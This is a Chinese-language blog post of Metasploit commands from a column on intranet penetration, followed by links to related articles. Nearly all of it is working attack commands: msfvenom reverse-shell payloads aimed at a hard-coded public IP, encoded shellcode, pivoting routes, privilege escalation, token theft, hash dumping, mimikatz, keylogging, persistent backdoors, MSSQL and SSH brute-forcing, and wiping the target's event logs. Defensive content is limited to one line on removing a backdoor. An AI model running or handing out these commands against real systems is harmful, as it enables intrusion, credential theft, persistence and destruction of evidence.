Metasploit常用操作

最新推荐文章于 2024-01-26 15:41:32 发布
最新推荐文章于 2024-01-26 15:41:32 发布
阅读量593 收藏 4
点赞数 1
分类专栏: 内网渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39997829/article/details/83655224
版权

payload的几个常用生成

 

1、生成windows下的反弹木马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=60.205.212.140 LPORT=8888 -f exe > 8888.exe

-p=payload -f format -o path

 

2、监听

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST 192.168.195.130

set LPORT 2333

exploit(攻击)

 

3、PHP

msfvenom -p php/meterpreter_reverse_tcp LHOST=60.205.212.140 LPORT=8888 -f raw > shell.php

use exploit/multi/handler
set PAYLOAD php/meterpreter_reverse_tcp
set LHOST 172.17.150.246
set LPORT 8888
exploit

 

4、shellcode

msfvenom -p windows/meterpreter/reverse_tcp LPORT=1234 LHOST=60.205.212.140 -e x86/shikata_ga_nai -i 11 -f py > 1.py //-e 使用编码 -i 编码次数

 

内网代理

首先需要连接到你get到的sessions,在此基础下添加路由

meterpreter > run get_local_subnets //获取网段
meterpreter > run autoroute -s 172.2.175.0/24 //添加路由
meterpreter > run autoroute -p //查看路由
meterpreter > run autoroute -d -s 172.2.175.0 //删除网段
meterpreter > run post/windows/gather/arp_scanner RHOSTS=7.7.7.0/24 //探测该网段下的存活主机。
meterpreter > background //后台sessions

 

提权

1、getsystem

meterpreter > getsystem //直getsystem提权,最常用简单的办法

 

2、使用exp提权

meterpreter > background //先后台运行会话
[*] Backgrounding session 1…
msf > use post/windows/escalate/ms10_073_kbdlayout
msf > show options
msf > set session 1 //设置要使用的会话
msf post(ms10_073_kbdlayout) > exploit
注意:如果创建了一个system进程,就可以立马sessions 1进入会话,然后ps查看进程,使用migrate pid注入到进程。
或者直接:
meterpreter > run post/windows/escalate/ms10_073_kbdlayout

3.盗取令牌

meterpreter > use incognito //进入这个模块
meterpreter > list_tokens –u //查看存在的令牌
meterpreter > impersonate_token NT AUTXXXX\SYSTEM //令牌是DelegationTokens一列,getuid查看,两个斜杠

注:只有具有“模仿安全令牌权限”的账户才能去模仿别人的令牌,一般大多数的服务型账户(IIS、MSSQL等)有这个权限,大多数用户级的账户没有这个权限。一般从web拿到的webshell都是IIS服务器权限,是具有这个模仿权限的,建好的账户没有这个权限。使用菜刀(IIS服务器权限)反弹meterpreter是服务型权限。

 

4.Bypassuac

msf > use exploit/windows/local/bypassuac //32位与64位一样,其他几个模块也一样
msf > show options
msf > set session 4
msf > run //成功后会返回一个新的session,进入新会话,发现权限没变,使用getsystem即可完成提权

 

5.Hash

meterpreter > run post/windows/gather/smart_hashdump //读取hash这种做法最智能,效果最好。

 

建立持久后门

1、服务启动后门

meterpreter > run metsvc -A //再开起一个终端,进入msfconsole
msf > use exploit/multi/handler //新终端中监听
msf > set payload windows/metsvc_bind_tcp
msf > set LPORT 31337
msf > set RHOST 192.168.0.128
msf > run //获取到的会话是system权限

 

2、启动项启动后门

meterpreter > run persistence -X -i 10 -p 6666 -r 192.168.71.105

// -X 系统开机自启,-i 10 10秒重连一次,-p 监听端口,-r 监听机。直接监听就好了,他自己会链接回来。
注意到移除 persistence 后门的办法是删除 HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ 中的注册表键和 C:\WINDOWS\TEMP\ 中的 VBScript 文件。
缺点:容易被杀毒软件杀

注意:这两个后门有个弊端,在进程中都会存在服务名称为meterpreter的进程。

 

漏洞扫描

1、对端口都扫描

use auxiliary/scanner/portscan/tcp
show options
set rhosts 192.168.2.1-255
set ports 21,22,25,443,445,1433,3306
set threads 20
exploit

2、mssql开发利用

2-1:对各个ip是否有mssql服务的探测
use scanner/mssql/mssql_ping //测试MSSQL的存在和信息
show options
set rhosts 192.168.2.1-255
set threads 30
exploit

2-2:对扫描到的ip进行爆破

use scanner/mssql/mssql_login //具体配置show options。

2-3:sa权限对其利用

use admin/mssql/mssql_exec
set rhost 192.168.2.10
set password sa
set CMD cmd.exe /c echo hello
exploit

3、爆破ssh模块

use auxiliary/scanner/ssh/ssh_login
set rhosts 7.7.7.20
set username root
set pass_file /root/pass.txt //加载字典,可以收集密码做字典
set threads 50
run

4、通过nmap扫描基本漏洞

msf > nmap  --script=vuln 受害靶机ip地址
msf > nmap  --script=mysql-info 192.168.0.4 //扫描mysql数据库信息 版本 等..

5、最后清除记录

msf > clearev //删除目标机上的应用程序、系统和安全日志。

 

一些常用命令

查看系统命令 sysinfo

截图 screenshot

查看是否是虚拟机 run checkvm

查看运行木马的用户 getuid

注入到进程 migrate pid //成功会提示successfully

加载mimikatz模块 meterpreter > load mimikatz meterpreter > wdigest //需要system权限

获取键盘记录:meterpreter> run post/windows/capture/keylog_recorder #运行键盘记录模块

进入session:sessions -i

 

 

 

 

 

安全大哥
关注
专栏目录
metasploit常用命令
Johnathan的博客
03-03 578
metasploit常用命令 service apache2 start service postgresql start msfconsole启动 1.MSF终端命令 show exploit 列出metasploit框架中的所有渗透攻击模块。 show payloads 列出metasploit框架中的所有攻击载荷。 show auxiliary 列出metasploit框架中的所有辅助攻击模块。 search name 查找metasploit框架中的所有渗透攻击和其他模块。
metasploit常用渗透命令.zip
09-16
本资料“metasploit常用渗透命令”主要聚焦于Metasploit框架中的常用命令,帮助用户理解和掌握其核心功能。 在Metasploit框架中,主要涉及以下几个关键概念: 1. **Meterpreter**:Meterpreter是一种动态的、功能...
常用metasploit命令
如鹿渴慕泉水的专栏
09-09 4307
-----------------------------------------openvas--------------------------------------------------------------------------------------------------------- gsad --listen=0.0.0.0 --port=5687  netstat -
Metasploit常用命令
weixin_43733912的博客
10-22 525
Metasploit基本命令 Metasploit入坑到放弃 特别说明:本笔记仅供安全研究使用,如有其他行为后果自负 环境 Kali 2019 目录: 开启控制台 搜索模块 调用模块 查看模块使用方法 设置目标IP地址 设置目标端口 exploit 总结 开启控制台 命令: msfconsole 搜索模块 命令: search ms17-010 # 模块名 这里以搜索 ms17-010 为例, auxiliary 开头的为测试模块,也就是 POC,看看存不存在漏洞, exploit 开头的为攻击
Msf的一些常用操作
weixin_33676492的博客
12-05 861
payload的几个常用生成 生成windows下的反弹木马 msfvenom -p windows/meterpreter/reverse_tcp LHOST=60.205.212.140 LPORT=8888 -f exe > 8888.exe// -p < payload > -f < format> -o < path&g...
metasploit - sshexec
Nixawk
08-15 1064
msf exploit(sshexec) > show options Module options (exploit/multi/ssh/sshexec): Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD passw
Metasploit 使用篇(一)
weixin_45626840的博客
02-19 1070
Metasploit使用基础
metasploit常用渗透命令[文].pdf
10-11
以下是一些关于Metasploit常用渗透命令的详细解释: 1. **升级命令**:`svn update` 是用来更新Metasploit框架到最新版本的,确保你使用的工具是最新的,可以修复已知问题并包含最新的漏洞利用。 2. **启动Web接口...
Metasploit基础命令与常用功能
Metasploit支持多种操作系统和网络服务,使其成为网络安全领域中使用广泛的工具之一。 ## 1.1 Metasploit是什么 Metasploit是一个功能强大的渗透测试工具,提供了用于开发、测试和执行漏洞利用的各种工具和资源。...
Metasploit常用漏洞扫描技术详解
其功能强大且灵活,拥有庞大的漏洞利用数据库和模块,是当前渗透测试领域最为常用的工具之一。 ## 1.2 Metasploit的历史和发展 Metasploit最初由HD Moore在2003年创建,后被Rapid7公司收购并继续开发。经过多年的...
【内网安全】——meterpreter使用攻略
最新发布
qq_53058639的博客
01-26 1323
Metasploit中的Meterpreter模块在后渗透阶段具有强大的攻击力,本文主要整理了meterpreter的常用命令、脚本及使用方式。包含信息收集、提权、注册表操作、令牌操纵、哈希利用、后门植入等。
渗透测试工具——Metasploit
热门推荐
weixin_59872639的博客
01-14 3万+
Metasplout简介 Metasploit是一款开源的安全漏洞检测工具,同时Metasploit是免费的工具。 Metasploit核心中绝大部分有Rudy实现,一小部分由汇编和C语言实现。 kali中自带Metasploit Metasploit文件结构与模块 路径: /usr/share/metasploit-framework/ config: MSF环境配置信息,数据库配置信息 data:后渗透模块的一些工具及payload,第三方小工具集合,用户字典等数据信息 doc
Msf命令详解
weixin_53747497的博客
04-10 2239
portfwd - 将本地端口转发到远程服务 例如:portfwd add -l 1122 -p 3389 -r 192.168.250.176把目标主机192.168.250.176的3389端口转发到1122端口。search - 在目标主机文件系统上查找搜索文件 例如:search -d c:\ -f *.doc 在目标主机C盘下搜索doc文档 show_mount - 列出所有装载点/逻辑驱动器。
MSF模拟渗透测试之攻击Android
lza20001103的博客
04-09 7158
MSF渗透测试系列之攻击Android
msf命令
净邪的博客
03-08 3382
基础命令概览:back(返回): 从目前的情况下向后移动banner:Display an awesome metasploit bannercd: 改变当前的工作目录color: 切换颜色connect(远程连接): 与主机通信edit(编辑): ...
supervisor nginx_Supervisor 的使用和进阶 (3)
weixin_39705018的博客
11-25 158
本文主要介绍 supervisor 对 fastcgi 进程的管理在php 中,php-fpm 有主进程来管理和维护子进程的数量。但是并不是所有的服务都有类似的主进程来做子进程的维护。在其他语言中,有很多比较有名的fastcgi 服务,例如py 的flup, c++ 实现的 FastCgi++等,如果这些服务在单机中启动多个进程(极有可能),那如何管理这些进程是个比较头疼的问题。supe...
Metasploit之——高级后渗透模块
冰河的专栏
01-27 1758
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86666767 1.迁移到更安全的进程 migrate [要迁移到的进程id] 2.获取系统级权限 getsystem 注:getsystem模块在比较新的Windows系统中不太稳定,最好使用本地的提升权限方法和模块来提升控制权限。 meterpreter &g...
msfconsole常用命令
wutiangui的博客
04-26 1043
命令:LHOST你本地可以让目标主机连接的IP地址,通常当目标主机不在同一个局域网内时,就需要是一个公共IP地址,特别为反弹式shell使用。命令:setg function以全局方式设置特定的配置参数(EG:设置本地或远程主机参数)。命令: show exploit 列出metasploit框架中的所有渗透攻击模块。命令:set function设置特定的配置参数(EG:设置本地或远程主机参数)。命令:show options列出某个渗透攻击或模块中所有的配置参数。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值